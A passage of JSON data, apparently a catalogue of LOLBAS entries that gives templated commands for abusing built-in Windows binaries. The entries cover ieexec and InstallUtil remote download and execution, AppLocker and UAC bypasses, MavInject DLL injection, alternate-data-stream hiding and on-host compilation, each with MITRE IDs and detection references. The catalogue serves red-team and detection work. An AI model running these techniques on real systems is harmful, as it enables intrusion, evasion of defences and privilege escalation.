host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieexec-exe:1","toolId":"lolbas:ieexec-exe","toolName":"Ieexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ieexec.exe {REMOTEURL:.exe}","description":"Downloads and executes executable from the remote server.","usecase":"Download and run attacker code from remote location","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"IOC","value":"Network connections originating from ieexec.exe may be suspicious"}],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ilasm-exe:0","toolId":"lolbas:ilasm-exe","toolName":"Ilasm.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"ilasm.exe {PATH_ABSOLUTE:.txt} /exe","description":"Binary file used by .NET to compile C#/intermediate (IL) code to .exe","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Ilasm may not be used often in production environments (such as on endpoints)"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ilasm-exe:1","toolId":"lolbas:ilasm-exe","toolName":"Ilasm.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"ilasm.exe {PATH_ABSOLUTE:.txt} /dll","description":"Binary file used by .NET to compile C#/intermediate (IL) code to dll","usecase":"A description of the usecase","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Ilasm may not be used often in production environments (such as on endpoints)"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:infdefaultinstall-exe:0","toolId":"lolbas:infdefaultinstall-exe","toolName":"Infdefaultinstall.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"InfDefaultInstall.exe {PATH:.inf}","description":"Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.","usecase":"Code execution","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\Infdefaultinstall.exe","C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://twitter.com/KyleHanslovan/status/911997635455852544","https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/","https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:installutil-exe:0","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}","description":"Execute the target .NET DLL or EXE.","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.004"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:installutil-exe:1","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}","description":"Execute the target .NET DLL or EXE.","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.004"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:installutil-exe:2","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"InstallUtil.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:iscsicpl-exe:0","toolId":"lolbas:iscsicpl-exe","toolName":"iscsicpl.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"c:\\windows\\syswow64\\iscsicpl.exe","description":"c:\\windows\\syswow64\\iscsicpl.exe has a DLL injection through `C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll`, resulting in UAC bypass.","usecase":"Execute a custom DLL via a trusted high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"},{"type":"IOC","value":"C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll"},{"type":"IOC","value":"Suspicious child process to iscsicpl.exe like cmd, powershell etc."}],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:iscsicpl-exe:1","toolId":"lolbas:iscsicpl-exe","toolName":"iscsicpl.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"iscsicpl.exe","description":"Both `c:\\windows\\system32\\iscsicpl.exe` and `c:\\windows\\system64\\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"},{"type":"IOC","value":"C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll"},{"type":"IOC","value":"Suspicious child process to iscsicpl.exe like cmd, powershell etc."}],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:jsc-exe:0","toolId":"lolbas:jsc-exe","toolName":"Jsc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"jsc.exe {PATH:.js}","description":"Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"type":"IOC","value":"Jsc.exe should normally not run a system unless it is used for development."}],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:jsc-exe:1","toolId":"lolbas:jsc-exe","toolName":"Jsc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"jsc.exe /t:library {PATH:.js}","description":"Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"type":"IOC","value":"Jsc.exe should normally not run a system unless it is used for development."}],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ldifde-exe:0","toolId":"lolbas:ldifde-exe","toolName":"Ldifde.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Ldifde -i -f {PATH:.ldf}","description":"Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"admin","fullPath":["c:\\windows\\system32\\ldifde.exe","c:\\windows\\syswow64\\ldifde.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_export.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml"}],"references":["https://twitter.com/0gtweet/status/1564968845726580736","https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:makecab-exe:0","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab","description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:makecab-exe:1","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab","description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:makecab-exe:2","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}","description":"Download and compresses the target file and stores it in the target file.","usecase":"Download file and compress into a cab file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:makecab-exe:3","toolId":"lolbas:makecab-exe","toolName":"Makecab.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"makecab /F {PATH:.ddf}","description":"Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["C:\\Windows\\System32\\makecab.exe","C:\\Windows\\SysWOW64\\makecab.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"IOC","value":"Makecab retrieving files from Internet"},{"type":"IOC","value":"Makecab storing data into alternate data streams"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://ss64.com/nt/makecab-directives.html","https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf","https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application","https://lolbas-project.github.io/lolbas/Binaries/Makecab/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mavinject-exe:0","toolId":"lolbas:mavinject-exe","toolName":"Mavinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}","description":"Inject evil.dll into a process with PID 3110.","usecase":"Inject dll file into running process","mitre":["T1218.013"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"type":"IOC","value":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mavinject-exe:1","toolId":"lolbas:mavinject-exe","toolName":"Mavinject.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll","description":"Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172","usecase":"Inject dll file into running process","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mavinject.exe","C:\\Windows\\SysWOW64\\mavinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"type":"IOC","value":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"references":["https://twitter.com/gN3mes1s/status/941315826107510784","https://twitter.com/Hexcorn/status/776122138063409152","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:microsoft-workflow-compiler-exe:0","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 